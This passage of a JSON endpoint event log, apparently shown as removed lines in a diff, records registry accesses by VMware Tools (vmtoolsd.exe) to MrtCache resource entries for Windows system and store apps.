Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570933550000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570934020000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570934020000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570934490000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware 
Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570934490000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570934960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8\\LanguageList", - "registry_value": 
"LanguageList", - "timestamp": 131883570934960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570935430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570935430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570936360000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570936360000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", - "registry_value": 
"C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570936990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570936990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570937460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570937460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570938080000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9079405c\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570938080000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - 
"process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570938550000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cbce6f20a\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570938710000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570939180000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570939180000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570939650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCamera_2018.824.60.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d7283a095\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570939650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570940430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 
6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5Cmicrosoft.windowscommunicationsapps_16005.11001.20106.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d2980fb18\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570940430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570941050000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5d8c844891\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570941050000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570941520000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsMaps_5.1811.3233.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d3750ccf4\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570941520000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570942150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b594531da9e\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570942150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570942619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
